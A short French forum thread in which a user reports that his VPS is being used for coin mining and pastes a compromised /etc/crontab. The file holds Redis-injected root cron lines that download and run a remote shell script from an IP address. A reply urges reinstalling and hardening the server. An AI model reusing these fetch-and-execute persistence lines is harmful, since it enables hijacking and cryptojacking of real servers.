Bonjour,
Je viens de voir que mon VPS est utilisé par des mineurs de coins.
C'est en ouvrant le fichier /etc/crontab
REDIS0006þ^@^@^Gbackup3Ã@Q@X^G
/4 * ^A^_root curl -fsSL http://199.19.22^T6.117/b2f628fff19fda9À^@^K/b.sh | sh
^@^Gbackup1@F
/2 * * * * root cd1 -fsSL http://199.19.226.117/b2f628/b.sh | sh
^@^Gbackup4Ã@Q@X^G
Pourtant la commande top n'indique aucune activité.
Stephane
Bonjour,
Il faut arrêter de faire des demandes partout.
Le serveur s'est fait hacké, le compte root est corrompu, on ne peut plus éditer les fichiers comme .ssh/authorized_keys ou
Il faut réinstaller le serveur, mettre de vraies règles de sécurité, éviter les mots de passe dictionnaire à 8 caractères, et installer les applicatifs via le gestionnaire de package qui permettra d'avoir des mises à jour régulières.
Il faut aussi utiliser des releases lts c'est a dire pour ubuntu la 20.04 par exemple.
Pour le moment je conseille vivement de repartir à zero au propre et de ne pas introduire de failles évidentes de sécurité.
Bonne journée
https://www.captainadmin.com